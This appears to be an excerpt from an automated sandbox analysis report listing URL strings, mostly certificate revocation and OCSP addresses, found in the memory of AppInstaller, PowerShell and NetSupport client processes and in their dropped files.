                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                                    Source: AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                    Source: AppInstaller.exe, 0000000E.00000003.1679946512.00000196D5F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0P
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesignsha2g2.crl0
                                    Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0#
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0N
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.drString found in binary or memory: http://crl.globalsign.net/root.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                                    Source: AppInstaller.exe, 0000000E.00000002.1776167790.00000196D5FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
                                    Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                                    Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
                                    Source: client32.exe, client32.exe, 00000020.00000003.1940686628.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000020.00000003.1941988586.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1940878596.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1942600345.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2537133329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2543509132.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                    Source: client32.exe, 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspBranchCache
                                    Source: client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspConnected
                                    Source: client32.exe, 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspCoreNet-Diag-ICMP6-EchoRequest-Out-NoScopeLMEMX
                                    Source: client32.exe, 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspMicrosoft-Windows-PeerDist-HostedClient-OutLMEMX
                                    Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                    Source: client32.exe, 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspuest-Out-NoScope
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
                                    Source: powershell.exe, 00000017.00000002.2398750900.000001E12D1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2180463385.000001E11EA2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2398750900.000001E12D07C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                                    Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                    Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.drString found in binary or memory: http://ocsp.thawte.com0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g20
                                    Source: powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png8
                                    Source: AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680011147.00000196D5F73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://s2.symcb.com0
                                    Source: AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micros
                                    Source: AppInstaller.exe, 0000000E.00000002.1763243158.00000196CDBEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: powershell.exe, 00000017.00000002.2180463385.000001E11D001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2535977313.000002678C697000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g2.crt08
                                    Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.drString found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.drString found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://sf.symcb.com/sf.crt0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://sf.symcd.com0&
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://sv.symcd.com0&
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
